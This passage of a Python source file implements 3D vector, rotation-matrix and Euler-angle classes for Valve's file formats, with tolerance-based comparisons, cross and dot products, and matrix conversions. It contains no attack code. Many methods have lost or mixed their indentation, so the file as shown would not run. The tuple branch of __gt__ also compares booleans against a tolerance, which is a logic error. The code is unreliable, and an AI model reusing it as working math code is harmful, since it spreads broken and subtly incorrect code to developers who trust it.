                abs(other.z - self.z) < 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            return (
                abs(self.x - other[0]) < 1e-6 and
                abs(self.y - other[1]) < 1e-6 and
                abs(self.z - other[2]) < 1e-6
            )
        else:
            return NotImplemented
    def __ne__(self, other: object) -> bool:
        """!= test.

        Two Vectors are compared based on the axes.
        A Vector can be compared with a 3-tuple as if it was a Vector also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Vec):
            # Exact logical negation of __eq__ (De Morgan of the < tests).
            return (
                abs(other.x - self.x) >= 1e-6 or
                abs(other.y - self.y) >= 1e-6 or
                abs(other.z - self.z) >= 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            return (
                abs(self.x - other[0]) >= 1e-6 or
                abs(self.y - other[1]) >= 1e-6 or
                abs(self.z - other[2]) >= 1e-6
            )
        else:
            return NotImplemented
    def __lt__(self, other: AnyVec) -> bool:
        """A<B test.

        Two Vectors are compared based on the axes.
        A Vector can be compared with a 3-tuple as if it was a Vector also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Vec):
            # True only when *all three* axes are smaller by more than the
            # tolerance - this is a partial, not total, ordering.
            return (
                (other.x - self.x) > 1e-6 and
                (other.y - self.y) > 1e-6 and
                (other.z - self.z) > 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            return (
                (other[0] - self.x) > 1e-6 and
                (other[1] - self.y) > 1e-6 and
                (other[2] - self.z) > 1e-6
            )
        else:
            return NotImplemented
    def __le__(self, other: AnyVec) -> bool:
        """A<=B test.

        Two Vectors are compared based on the axes.
        A Vector can be compared with a 3-tuple as if it was a Vector also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Vec):
            # All three axes must not exceed the other by more than the
            # tolerance.
            return (
                (self.x - other.x) <= 1e-6 and
                (self.y - other.y) <= 1e-6 and
                (self.z - other.z) <= 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            return (
                (self.x - other[0]) <= 1e-6 and
                (self.y - other[1]) <= 1e-6 and
                (self.z - other[2]) <= 1e-6
            )
        else:
            return NotImplemented
def __gt__(self,other: AnyVec) -> bool:
"""A>B test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
(self.x - other.x) > 1e-6 and
(self.y - other.y) > 1e-6 and
(self.z - other.z) > 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
(self.x > other[0]) > 1e-6 and
(self.y > other[1]) > 1e-6 and
(self.z > other[2]) > 1e-6
)
else:
return NotImplemented
    def __ge__(self, other: AnyVec) -> bool:
        """A>=B test.

        Two Vectors are compared based on the axes.
        A Vector can be compared with a 3-tuple as if it was a Vector also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Vec):
            # The other vector must not exceed self on any axis by more than
            # the tolerance.
            return (
                (other.x - self.x) <= 1e-6 and
                (other.y - self.y) <= 1e-6 and
                (other.z - self.z) <= 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            return (
                (other[0] - self.x) <= 1e-6 and
                (other[1] - self.y) <= 1e-6 and
                (other[2] - self.z) <= 1e-6
            )
        else:
            return NotImplemented
    def max(self, other: AnyVec) -> None:
        """Set this vector's values to the maximum of the two vectors."""
        # In-place, axis-by-axis; accepts any indexable 3-value sequence.
        if self.x < other[0]:
            self.x = other[0]
        if self.y < other[1]:
            self.y = other[1]
        if self.z < other[2]:
            self.z = other[2]

    def min(self, other: AnyVec) -> None:
        """Set this vector's values to be the minimum of the two vectors."""
        # In-place, axis-by-axis; accepts any indexable 3-value sequence.
        if self.x > other[0]:
            self.x = other[0]
        if self.y > other[1]:
            self.y = other[1]
        if self.z > other[2]:
            self.z = other[2]
    def __round__(self, ndigits: int=0) -> 'Vec':
        """Performing round() on a Py_Vec rounds each axis."""
        return Py_Vec(
            round(self.x, ndigits),
            round(self.y, ndigits),
            round(self.z, ndigits),
        )
    def mag(self) -> float:
        """Compute the distance from the vector and the origin."""
        return math.sqrt(self.x**2 + self.y**2 + self.z**2)

    def join(self, delim: str=', ') -> str:
        """Return a string with all numbers joined by the passed delimiter.

        This strips off the .0 if no decimal portion exists.
        """
        # :g strips the .0 off of floats if it's an integer.
        return f'{self.x:g}{delim}{self.y:g}{delim}{self.z:g}'
    def __str__(self) -> str:
        """Return the values, separated by spaces.

        This is the main format in Valve's file formats.
        This strips off the .0 if no decimal portion exists.
        """
        return f"{self.x:g} {self.y:g} {self.z:g}"

    def __format__(self, format_spec: str) -> str:
        """Control how the text is formatted."""
        # Default to :g, matching __str__.
        if not format_spec:
            format_spec = 'g'
        return f"{self.x:{format_spec}} {self.y:{format_spec}} {self.z:{format_spec}}"

    def __repr__(self) -> str:
        """Code required to reproduce this vector."""
        return f"Vec({self.x:g}, {self.y:g}, {self.z:g})"
    def __iter__(self) -> Iterator[float]:
        """Allow iterating through the dimensions."""
        yield self.x
        yield self.y
        yield self.z
def __getitem__(self, ind: Union[str, int]) -> float:
"""Allow reading values by index instead of name if desired.
This accepts either 0,1,2 or 'x','y','z' to read values.
Useful in conjunction with a loop to apply commands to all values.
"""
if ind == 0 or ind == "x":
return self.x
elif ind == 1 or ind == "y":
return self.y
elif ind == 2 or ind == "z":
return self.z
raise KeyError(f'Invalid axis: {ind!r}')
def __setitem__(self, ind: Union[str, int], val: float) -> None:
"""Allow editing values by index instead of name if desired.
This accepts either 0,1,2 or 'x','y','z' to edit values.
Useful in conjunction with a loop to apply commands to all values.
"""
if ind == 0 or ind == "x":
self.x = float(val)
elif ind == 1 or ind == "y":
self.y = float(val)
elif ind == 2 or ind == "z":
self.z = float(val)
else:
raise KeyError(f'Invalid axis: {ind!r}')
    # Annotation improved: b is only indexed, so any 3-value sequence works,
    # matching a.
    def in_bbox(self, a: AnyVec, b: AnyVec) -> bool:
        """Check if this point is inside the specified bounding box."""
        # min/max per axis so the corners may be given in any order.
        return (
            min(a[0], b[0]) <= self.x <= max(a[0], b[0]) and
            min(a[1], b[1]) <= self.y <= max(a[1], b[1]) and
            min(a[2], b[2]) <= self.z <= max(a[2], b[2])
        )
def other_axes(self, axis: str) -> Tuple[float, float]:
"""Get the values for the other two axes."""
if axis == 'x':
return self.y, self.z
if axis == 'y':
return self.x, self.z
if axis == 'z':
return self.x, self.y
raise KeyError('Bad axis "{}"'.format(axis))
def as_tuple(self) -> Vec_tuple:
    """Return the Vector as a tuple."""
    # Round to 6 places so tuples from nearly-equal vectors compare equal.
    rounded = (round(axis, 6) for axis in (self.x, self.y, self.z))
    return Vec_tuple(*rounded)
def len_sq(self) -> float:
"""Return the magnitude squared, which is slightly faster."""
return self.x**2 + self.y**2 + self.z**2
def __len__(self) -> int:
"""The len() of a vector is the number of non-zero axes."""
return (
(abs(self.x) > 1e-6) +
(abs(self.y) > 1e-6) +
(abs(self.z) > 1e-6)
)
def __contains__(self, val: float) -> bool:
"""Check to see if an axis is set to the given value.
"""
return abs(val - self.x) < 1e-6 or abs(val - self.y) < 1e-6 or abs(val - self.z) < 1e-6
def __neg__(self) -> 'Vec':
    """The inverted form of a Vector has inverted axes."""
    return Py_Vec(*(-axis for axis in (self.x, self.y, self.z)))
def __pos__(self) -> 'Vec':
    """+ on a Vector simply copies it."""
    values = (self.x, self.y, self.z)
    return Py_Vec(*values)
def norm(self) -> 'Vec':
    """Normalise the Vector.

    This is done by transforming it to have a magnitude of 1 but the same
    direction.
    The vector is left unchanged if it is equal to (0,0,0)
    """
    if self.x == 0 and self.y == 0 and self.z == 0:
        # Normalising the zero vector would divide by zero; return a
        # copy unchanged so it stays a valid value.
        return self.copy()
    result = self / self.mag()
    # Adding 0 clears -0 values - we don't want those.
    result += 0
    return result
def dot(self, other: AnyVec) -> float:
    """Return the dot product of both Vectors."""
    ox, oy, oz = other[0], other[1], other[2]
    return self.x * ox + self.y * oy + self.z * oz
def cross(self, other: AnyVec) -> 'Vec':
    """Return the cross product of both Vectors."""
    ox, oy, oz = other[0], other[1], other[2]
    return Py_Vec(
        self.y * oz - self.z * oy,
        self.z * ox - self.x * oz,
        self.x * oy - self.y * ox,
    )
def localise(
    self,
    origin: Union['Vec', Tuple3],
    angles: Union['Angle', 'Matrix']=None,
) -> None:
    """Shift this point to be local to the given position and angles.

    This effectively translates local-space offsets to a global location,
    given the parent's origin and angles.  Mutates this vector in place.
    """
    # Rotate first, then translate - the order matters.
    mat = to_matrix(angles)
    mat._vec_rot(self)
    self += origin
def norm_mask(self, normal: 'Vec') -> 'Vec':
    """Subtract the components of this vector not in the direction of the normal.

    If the normal is axis-aligned, this will zero out the other axes.
    If not axis-aligned, it will do the equivalent.
    """
    direction = normal.norm()
    scale = self.dot(direction)
    return direction * scale
# Alternate names for the same operations: len()/mag() and
# len_sq()/mag_sq() are interchangeable.
len = mag
mag_sq = len_sq
@contextlib.contextmanager
def transform(self) -> Iterator['Matrix']:
    """Perform rotations on this Vector efficiently.

    Used as a context manager, which returns a matrix.
    When the body is exited safely, the matrix is applied to
    the angle.
    """
    mat = Py_Matrix()
    yield mat
    # Only reached when the with-body raised no exception: apply the
    # accumulated rotation to this vector in place.
    mat._vec_rot(self)
# Maps a (row, column) pair (each 0-2) to the matching Matrix slot name,
# e.g. (0, 2) -> '_ac'.  Used by Matrix.__getitem__/__setitem__.
_IND_TO_SLOT = {
    (x, y): f'_{chr(ord("a")+x)}{chr(ord("a")+y)}'
    for x in (0, 1, 2)
    for y in (0, 1, 2)
}
class Matrix:
    """Represents a matrix via a transformation matrix.

    The three rows hold the rotated forward (+X), left (+Y) and up (+Z)
    basis vectors respectively (see forward()/left()/up() below).
    """
    __slots__ = [
        '_aa', '_ab', '_ac',
        '_ba', '_bb', '_bc',
        '_ca', '_cb', '_cc'
    ]

    def __init__(self) -> None:
        """Create a matrix set to the identity transform."""
        self._aa, self._ab, self._ac = 1.0, 0.0, 0.0
        self._ba, self._bb, self._bc = 0.0, 1.0, 0.0
        self._ca, self._cb, self._cc = 0.0, 0.0, 1.0

    def __eq__(self, other: object) -> bool:
        # Exact float comparison - unlike Angle.__eq__, no 1e-6 tolerance.
        if isinstance(other, Py_Matrix):
            return (
                self._aa == other._aa and self._ab == other._ab and self._ac == other._ac and
                self._ba == other._ba and self._bb == other._bb and self._bc == other._bc and
                self._ca == other._ca and self._cb == other._cb and self._cc == other._cc
            )
        return NotImplemented

    def __repr__(self) -> str:
        return (
            '<Matrix '
            f'{self._aa:.3} {self._ab:.3} {self._ac:.3}, '
            f'{self._ba:.3} {self._bb:.3} {self._bc:.3}, '
            f'{self._ca:.3} {self._cb:.3} {self._cc:.3}'
            '>'
        )

    def copy(self) -> 'Matrix':
        """Duplicate this matrix."""
        # __new__ skips __init__'s identity fill; every slot is assigned below.
        rot = Py_Matrix.__new__(Py_Matrix)
        rot._aa, rot._ab, rot._ac = self._aa, self._ab, self._ac
        rot._ba, rot._bb, rot._bc = self._ba, self._bb, self._bc
        rot._ca, rot._cb, rot._cc = self._ca, self._cb, self._cc
        return rot

    def __reduce__(self) -> tuple:
        """Pickling support.

        This redirects to a global function, so C/Python versions
        interoperate.
        """
        return (_mk_mat, (
            self._aa, self._ab, self._ac,
            self._ba, self._bb, self._bc,
            self._ca, self._cb, self._cc
        ))

    @classmethod
    def from_pitch(cls: Type['Matrix'], pitch: float) -> 'Matrix':
        """Return the matrix representing a pitch rotation.

        This is a rotation around the Y axis.
        """
        rad_pitch = math.radians(pitch)
        cos = math.cos(rad_pitch)
        sin = math.sin(rad_pitch)
        rot: Matrix = cls.__new__(cls)
        rot._aa, rot._ab, rot._ac = cos, 0.0, -sin
        rot._ba, rot._bb, rot._bc = 0.0, 1.0, 0.0
        rot._ca, rot._cb, rot._cc = sin, 0.0, cos
        return rot

    @classmethod
    def from_yaw(cls: Type['Matrix'], yaw: float) -> 'Matrix':
        """Return the matrix representing a yaw rotation.

        This is a rotation around the Z axis.
        """
        rad_yaw = math.radians(yaw)
        sin = math.sin(rad_yaw)
        cos = math.cos(rad_yaw)
        rot: Matrix = cls.__new__(cls)
        rot._aa, rot._ab, rot._ac = cos, sin, 0.0
        rot._ba, rot._bb, rot._bc = -sin, cos, 0.0
        rot._ca, rot._cb, rot._cc = 0.0, 0.0, 1.0
        return rot

    @classmethod
    def from_roll(cls: Type['Matrix'], roll: float) -> 'Matrix':
        """Return the matrix representing a roll rotation.

        This is a rotation around the X axis.
        """
        rad_roll = math.radians(roll)
        cos_r = math.cos(rad_roll)
        sin_r = math.sin(rad_roll)
        rot: Matrix = cls.__new__(cls)
        rot._aa, rot._ab, rot._ac = 1.0, 0.0, 0.0
        rot._ba, rot._bb, rot._bc = 0.0, cos_r, sin_r
        rot._ca, rot._cb, rot._cc = 0.0, -sin_r, cos_r
        return rot

    @classmethod
    @overload
    def from_angle(cls, __angle: 'Angle') -> 'Matrix': ...
    @classmethod
    @overload
    def from_angle(cls, pitch: float, yaw: float, roll: float) -> 'Matrix': ...
    @classmethod
    def from_angle(
        cls,
        pitch: Union['Angle', float],
        yaw: Optional[float]=0.0,
        roll: Optional[float]=None,
    ) -> 'Matrix':
        """Return the rotation representing an Euler angle.

        Either an Angle can be passed, or the raw pitch/yaw/roll angles.
        """
        if isinstance(pitch, Py_Angle):
            rad_pitch = math.radians(pitch.pitch)
            rad_yaw = math.radians(pitch.yaw)
            rad_roll = math.radians(pitch.roll)
        elif yaw is None or roll is None:
            # NOTE(review): the message says 'from_angles()' but the method
            # is named from_angle().
            raise TypeError('Matrix.from_angles() accepts a single Angle or 3 floats!')
        else:
            rad_pitch = math.radians(pitch)
            rad_yaw = math.radians(yaw)
            rad_roll = math.radians(roll)
        cos_p = math.cos(rad_pitch)
        sin_p = math.sin(rad_pitch)
        sin_y = math.sin(rad_yaw)
        cos_y = math.cos(rad_yaw)
        cos_r = math.cos(rad_roll)
        sin_r = math.sin(rad_roll)
        rot = Py_Matrix.__new__(Py_Matrix)
        rot._aa = cos_p * cos_y
        rot._ab = cos_p * sin_y
        rot._ac = -sin_p
        # Shared products for the lower two rows.
        cos_r_cos_y = cos_r * cos_y
        cos_r_sin_y = cos_r * sin_y
        sin_r_cos_y = sin_r * cos_y
        sin_r_sin_y = sin_r * sin_y
        rot._ba = sin_p * sin_r_cos_y - cos_r_sin_y
        rot._bb = sin_p * sin_r_sin_y + cos_r_cos_y
        rot._bc = sin_r * cos_p
        rot._ca = (sin_p * cos_r_cos_y + sin_r_sin_y)
        rot._cb = (sin_p * cos_r_sin_y - sin_r_cos_y)
        rot._cc = cos_r * cos_p
        return rot

    @classmethod
    def axis_angle(cls, axis: Union[Vec, Tuple3], angle: float) -> 'Matrix':
        """Compute the rotation matrix forming a rotation around an axis by a specific angle."""
        x, y, z = Vec(axis).norm()
        # Invert, so it matches the orientation of Angles().
        angle_rad = -math.radians(angle)
        cos = math.cos(angle_rad)
        icos = 1 - cos
        sin = math.sin(angle_rad)
        mat = Py_Matrix.__new__(Py_Matrix)
        mat._aa = x*x * icos + cos
        mat._ab = x*y * icos - z*sin
        mat._ac = x*z * icos + y*sin
        mat._ba = y*x * icos + z*sin
        mat._bb = y*y * icos + cos
        mat._bc = y*z * icos - x*sin
        mat._ca = z*x * icos - y*sin
        mat._cb = z*y * icos + x*sin
        mat._cc = z*z * icos + cos
        return mat

    def forward(self) -> 'Vec':
        """Return a normalised vector pointing in the +X direction."""
        return Py_Vec(self._aa, self._ab, self._ac)

    def left(self) -> 'Vec':
        """Return a normalised vector pointing in the +Y direction."""
        return Py_Vec(self._ba, self._bb, self._bc)

    def up(self) -> 'Vec':
        """Return a normalised vector pointing in the +Z direction."""
        return Py_Vec(self._ca, self._cb, self._cc)

    def __getitem__(self, item: Tuple[int, int]) -> float:
        """Retrieve an individual matrix value by x, y position (0-2)."""
        return getattr(self, _IND_TO_SLOT[item])

    def __setitem__(self, item: Tuple[int, int], value: float) -> None:
        """Set an individual matrix value by x, y position (0-2)."""
        setattr(self, _IND_TO_SLOT[item], value)

    def to_angle(self) -> 'Angle':
        """Return an Euler angle replicating this rotation."""
        # https://github.com/ValveSoftware/source-sdk-2013/blob/master/sp/src/mathlib/mathlib_base.cpp#L208
        for_x = self._aa
        for_y = self._ab
        for_z = self._ac
        left_x = self._ba
        left_y = self._bb
        left_z = self._bc
        # up_x = self.ca
        # up_y = self.cb
        up_z = self._cc
        horiz_dist = math.sqrt(for_x**2 + for_y**2)
        if horiz_dist > 0.001:
            return Py_Angle(
                yaw=math.degrees(math.atan2(for_y, for_x)),
                pitch=math.degrees(math.atan2(-for_z, horiz_dist)),
                roll=math.degrees(math.atan2(left_z, up_z)),
            )
        else:
            # Vertical, gimbal lock (yaw=roll)...
            return Py_Angle(
                yaw=math.degrees(math.atan2(-left_x, left_y)),
                pitch=math.degrees(math.atan2(-for_z, horiz_dist)),
                roll=0, # Can't produce.
            )

    def transpose(self) -> 'Matrix':
        """Return the transpose of this matrix."""
        rot = Py_Matrix.__new__(Py_Matrix)
        rot._aa, rot._ab, rot._ac = self._aa, self._ba, self._ca
        rot._ba, rot._bb, rot._bc = self._ab, self._bb, self._cb
        rot._ca, rot._cb, rot._cc = self._ac, self._bc, self._cc
        return rot

    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, y: Vec, z: Vec) -> 'Matrix': ...
    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, y: Vec) -> 'Matrix': ...
    @classmethod
    @overload
    def from_basis(cls, *, y: Vec, z: Vec) -> 'Matrix': ...
    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, z: Vec) -> 'Matrix': ...
    @classmethod
    def from_basis(
        cls, *,
        x: Vec=None,
        y: Vec=None,
        z: Vec=None,
    ) -> 'Matrix':
        """Construct a matrix from at least two basis vectors.

        The third is computed, if not provided.
        """
        # Derive the missing axis via the cross product of the other two.
        if x is None and y is not None and z is not None:
            x = Vec.cross(y, z)
        elif y is None and x is not None and z is not None:
            y = Vec.cross(z, x)
        elif z is None and x is not None and y is not None:
            z = Vec.cross(x, y)
        if x is None or y is None or z is None:
            raise TypeError('At least two vectors must be provided!')
        mat: Matrix = cls.__new__(cls)
        mat._aa, mat._ab, mat._ac = x.norm()
        mat._ba, mat._bb, mat._bc = y.norm()
        mat._ca, mat._cb, mat._cc = z.norm()
        return mat

    @overload
    def __matmul__(self, other: 'Matrix') -> 'Matrix': ...
    @overload
    def __matmul__(self, other: 'Angle') -> 'Matrix': ...
    def __matmul__(self, other: 'Matrix | Angle') -> 'Matrix':
        if isinstance(other, Py_Matrix):
            mat = self.copy()
            mat._mat_mul(other)
            return mat
        elif isinstance(other, Py_Angle):
            mat = self.copy()
            mat._mat_mul(Py_Matrix.from_angle(other))
            return mat
        else:
            return NotImplemented

    @overload
    def __rmatmul__(self, other: Vec) -> Vec: ...
    @overload
    def __rmatmul__(self, other: 'Matrix') -> 'Matrix': ...
    @overload
    def __rmatmul__(self, other: 'Angle') -> 'Angle': ...
    def __rmatmul__(self, other):
        # LHS @ self: rotate the left operand by this matrix.
        if isinstance(other, Py_Vec):
            result = other.copy()
            self._vec_rot(result)
            return result
        elif isinstance(other, Py_Angle):
            mat = Py_Matrix.from_angle(other)
            mat._mat_mul(self)
            return mat.to_angle()
        elif isinstance(other, Py_Matrix):
            mat = other.copy()
            mat._mat_mul(self)
            return mat
        else:
            return NotImplemented

    @overload
    def __imatmul__(self, other: 'Matrix') -> 'Matrix': ...
    @overload
    def __imatmul__(self, other: 'Angle') -> 'Matrix': ...
    def __imatmul__(self, other: 'Matrix | Angle') -> 'Matrix':
        if isinstance(other, Py_Matrix):
            self._mat_mul(other)
            return self
        elif isinstance(other, Py_Angle):
            self._mat_mul(Py_Matrix.from_angle(other))
            return self
        else:
            return NotImplemented

    def _mat_mul(self, other: 'Matrix') -> None:
        """Rotate myself by the other matrix."""
        # We don't use each row after assigning to the set, so we can re-assign.
        # 3-tuple unpacking is optimised.
        self._aa, self._ab, self._ac = (
            self._aa * other._aa + self._ab * other._ba + self._ac * other._ca,
            self._aa * other._ab + self._ab * other._bb + self._ac * other._cb,
            self._aa * other._ac + self._ab * other._bc + self._ac * other._cc,
        )
        self._ba, self._bb, self._bc = (
            self._ba * other._aa + self._bb * other._ba + self._bc * other._ca,
            self._ba * other._ab + self._bb * other._bb + self._bc * other._cb,
            self._ba * other._ac + self._bb * other._bc + self._bc * other._cc,
        )
        self._ca, self._cb, self._cc = (
            self._ca * other._aa + self._cb * other._ba + self._cc * other._ca,
            self._ca * other._ab + self._cb * other._bb + self._cc * other._cb,
            self._ca * other._ac + self._cb * other._bc + self._cc * other._cc,
        )

    def _vec_rot(self, vec: Vec) -> None:
        """Rotate a vector by our value."""
        # Treats vec as a row vector: vec' = vec @ self (mutated in place).
        x = vec.x
        y = vec.y
        z = vec.z
        vec.x = (x * self._aa) + (y * self._ba) + (z * self._ca)
        vec.y = (x * self._ab) + (y * self._bb) + (z * self._cb)
        vec.z = (x * self._ac) + (y * self._bc) + (z * self._cc)
class Angle:
    """Represents a pitch-yaw-roll Euler angle.

    All values are remapped to between 0-360 when set.
    Addition and subtraction modify values, matrix-multiplication with
    Vec, Angle or Matrix rotates (RHS rotating LHS).
    """
    # We have to double-modulus because -1e-14 % 360.0 = 360.0.
    __slots__ = ['_pitch', '_yaw', '_roll']

    def __init__(
        self,
        pitch: Union[int, float, Iterable[Union[int, float]]]=0.0,
        yaw: Union[int, float]=0.0,
        roll: Union[int, float]=0.0,
    ) -> None:
        """Create an Angle.

        All values are converted to Floats automatically.
        If no value is given, that axis will be set to 0.
        An iterable can be passed in (as the pitch argument), which will be
        used for pitch, yaw, and roll. This includes Vectors and other Angles.
        """
        if isinstance(pitch, (int, float)):
            self._pitch = float(pitch) % 360 % 360
            self._yaw = float(yaw) % 360 % 360
            self._roll = float(roll) % 360 % 360
        else:
            # Iterable: missing values fall back to the yaw/roll arguments.
            it = iter(pitch)
            self._pitch = float(next(it, 0.0)) % 360 % 360
            self._yaw = float(next(it, yaw)) % 360 % 360
            self._roll = float(next(it, roll)) % 360 % 360

    def copy(self) -> 'Angle':
        """Create a duplicate of this angle."""
        return Py_Angle(self._pitch, self._yaw, self._roll)

    __copy__ = copy

    def __reduce__(self) -> tuple:
        """Pickling support.

        This redirects to a global function, so C/Python versions
        interoperate.
        """
        return _mk_ang, (self._pitch, self._yaw, self._roll)

    @classmethod
    def from_str(cls, val: Union[str, 'Angle'], pitch=0.0, yaw=0.0, roll=0.0) -> 'Angle':
        """Convert a string in the form '(4 6 -4)' into an Angle.

        If the string is unparsable, this uses the defaults.
        The string can start with any of the (), {}, [], <> bracket
        types, or none.

        If the value is already a Angle, a copy will be returned.
        """
        pitch, yaw, roll = Py_parse_vec_str(val, pitch, yaw, roll)
        return cls(pitch, yaw, roll)

    @property
    def pitch(self) -> float:
        """The Y-axis rotation, performed second."""
        return self._pitch

    @pitch.setter
    def pitch(self, pitch: float) -> None:
        self._pitch = float(pitch) % 360 % 360

    @property
    def yaw(self) -> float:
        """The Z-axis rotation, performed last."""
        return self._yaw

    @yaw.setter
    def yaw(self, yaw: float) -> None:
        self._yaw = float(yaw) % 360 % 360

    @property
    def roll(self) -> float:
        """The X-axis rotation, performed first."""
        return self._roll

    @roll.setter
    def roll(self, roll: float) -> None:
        self._roll = float(roll) % 360 % 360

    def join(self, delim: str=', ') -> str:
        """Return a string with all numbers joined by the passed delimiter.

        This strips off the .0 if no decimal portion exists.
        """
        # :g strips the .0 off of floats if it's an integer.
        return f'{self._pitch:g}{delim}{self._yaw:g}{delim}{self._roll:g}'

    def __str__(self) -> str:
        """Return the values, separated by spaces.

        This is the main format in Valve's file formats, though identical to
        vectors.
        This strips off the .0 if no decimal portion exists.
        """
        return f"{self._pitch:g} {self._yaw:g} {self._roll:g}"

    def __repr__(self) -> str:
        return f'Angle({self._pitch:g}, {self._yaw:g}, {self._roll:g})'

    def __format__(self, format_spec: str) -> str:
        """Control how the text is formatted."""
        if not format_spec:
            format_spec = 'g'
        return f"{self._pitch:{format_spec}} {self._yaw:{format_spec}} {self._roll:{format_spec}}"

    def as_tuple(self) -> Tuple[float, float, float]:
        """Return the Angle as a tuple."""
        # NOTE(review): this actually returns a Vec_tuple (named fields
        # x/y/z), not a plain tuple.
        return Vec_tuple(self._pitch, self._yaw, self._roll)

    def __iter__(self) -> Iterator[float]:
        """Iterating over the angles returns each value in turn."""
        yield self._pitch
        yield self._yaw
        yield self._roll

    @classmethod
    @overload
    def with_axes(cls, axis1: str, val1: Union[float, 'Angle']) -> 'Angle':
        ...
    @classmethod
    @overload
    def with_axes(
        cls,
        axis1: str, val1: Union[float, 'Angle'],
        axis2: str, val2: Union[float, 'Angle'],
    ) -> 'Angle':
        ...
    @classmethod
    @overload
    def with_axes(
        cls,
        axis1: str, val1: Union[float, 'Angle'],
        axis2: str, val2: Union[float, 'Angle'],
        axis3: str, val3: Union[float, 'Angle'],
    ) -> 'Angle':
        ...
    @classmethod
    def with_axes(
        cls,
        axis1: str,
        val1: Union[float, 'Angle'],
        axis2: str = None,
        val2: Union[float, 'Angle'] = 0.0,
        axis3: str = None,
        val3: Union[float, 'Angle'] = 0.0,
    ) -> 'Angle':
        """Create an Angle, given a number of axes and corresponding values.

        This is a convenience for doing the following:
            ang = Angle()
            ang[axis1] = val1
            ang[axis2] = val2
            ang[axis3] = val3
        The magnitudes can also be Angles, in which case the matching
        axis will be used from the angle.
        """
        ang = cls()
        ang[axis1] = val1[axis1] if isinstance(val1, Py_Angle) else val1
        if axis2 is not None:
            ang[axis2] = val2[axis2] if isinstance(val2, Py_Angle) else val2
            if axis3 is not None:
                ang[axis3] = val3[axis3] if isinstance(val3, Py_Angle) else val3
        return ang

    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, y: Vec, z: Vec) -> 'Angle': ...
    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, y: Vec) -> 'Angle': ...
    @classmethod
    @overload
    def from_basis(cls, *, y: Vec, z: Vec) -> 'Angle': ...
    @classmethod
    @overload
    def from_basis(cls, *, x: Vec, z: Vec) -> 'Angle': ...
    @classmethod
    def from_basis(cls, **kwargs) -> 'Angle':
        """Return the rotation which results in the specified local axes.

        At least two must be specified, with the third computed if necessary.
        """
        # Delegates to Matrix.from_basis, then converts back to Euler angles.
        return Py_Matrix.from_basis(**kwargs).to_angle()

    def __getitem__(self, ind: Union[str, int]) -> float:
        """Allow reading values by index instead of name if desired.

        This accepts the following indexes to read values:
        - 0, 1, 2
        - pitch, yaw, roll
        - pit, yaw, rol
        - p, y, r
        Useful in conjunction with a loop to apply commands to all values.
        """
        if ind in (0, 'p', 'pit', 'pitch'):
            return self._pitch
        elif ind in (1, 'y', 'yaw'):
            return self._yaw
        elif ind in (2, 'r', 'rol', 'roll'):
            return self._roll
        raise KeyError('Invalid axis: {!r}'.format(ind))

    def __setitem__(self, ind: Union[str, int], val: float) -> None:
        """Allow editing values by index instead of name if desired.

        This accepts either 0,1,2 or 'x','y','z' to edit values.
        Useful in conjunction with a loop to apply commands to all values.
        """
        if ind in (0, 'p', 'pit', 'pitch'):
            self._pitch = float(val) % 360.0 % 360.0
        elif ind in (1, 'y', 'yaw'):
            self._yaw = float(val) % 360.0 % 360.0
        elif ind in (2, 'r', 'rol', 'roll'):
            self._roll = float(val) % 360.0 % 360.0
        else:
            raise KeyError('Invalid axis: {!r}'.format(ind))

    def __eq__(self, other: object) -> bool:
        """== test.

        Two Angles are equal if all three axes are the same.
        An Angle can be compared with a 3-tuple as if it was a Angle also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Angle):
            return (
                abs(other._pitch - self._pitch) <= 1e-6 and
                abs(other._yaw - self._yaw) <= 1e-6 and
                abs(other._roll - self._roll) <= 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            # Normalise the tuple into 0-360 first, like the setters do.
            pit = other[0] % 360.0 % 360.0
            yaw = other[1] % 360.0 % 360.0
            rol = other[2] % 360.0 % 360.0
            return (
                abs(self._pitch - pit) <= 1e-6 and
                abs(self._yaw - yaw) <= 1e-6 and
                abs(self._roll - rol) <= 1e-6
            )
        else:
            return NotImplemented

    def __ne__(self, other: object) -> bool:
        """!= test.

        Two Angles are equal if all three axes are the same.
        An Angle can be compared with a 3-tuple as if it was a Angle also.
        A tolerance of 1e-6 is accounted for automatically.
        """
        if isinstance(other, Py_Angle):
            return (
                abs(other._pitch - self._pitch) > 1e-6 or
                abs(other._yaw - self._yaw) > 1e-6 or
                abs(other._roll - self._roll) > 1e-6
            )
        elif isinstance(other, tuple) and len(other) == 3:
            pit = other[0] % 360.0 % 360.0
            yaw = other[1] % 360.0 % 360.0
            rol = other[2] % 360.0 % 360.0
            return (
                abs(self._pitch - pit) > 1e-6 or
                abs(self._yaw - yaw) > 1e-6 or
                abs(self._roll - rol) > 1e-6
            )
        else:
            return NotImplemented
    # No ordering, there isn't any sensible relationship.

    def __mul__(self, other: Union[int, float]) -> 'Angle':
        """Angle * float multiplies each value."""
        if isinstance(other, (int, float)):
            return Py_Angle(
                self._pitch * other,
                self._yaw * other,
                self._roll * other,
            )
        return NotImplemented

    def __rmul__(self, other: Union[int, float]) -> 'Angle':
        """Angle * float multiplies each value."""
        if isinstance(other, (int, float)):
            return Py_Angle(
                other * self._pitch,
                other * self._yaw,
                other * self._roll,
            )
        return NotImplemented

    def __matmul__(self, other: 'Angle') -> 'Angle':
        """Angle @ Angle rotates the first by the second.
        """
        if isinstance(other, Py_Angle):
            return other._rotate_angle(self)
        else:
            return NotImplemented

    @overload
    def __rmatmul__(self, other: 'Angle') -> 'Angle': ...
    @overload
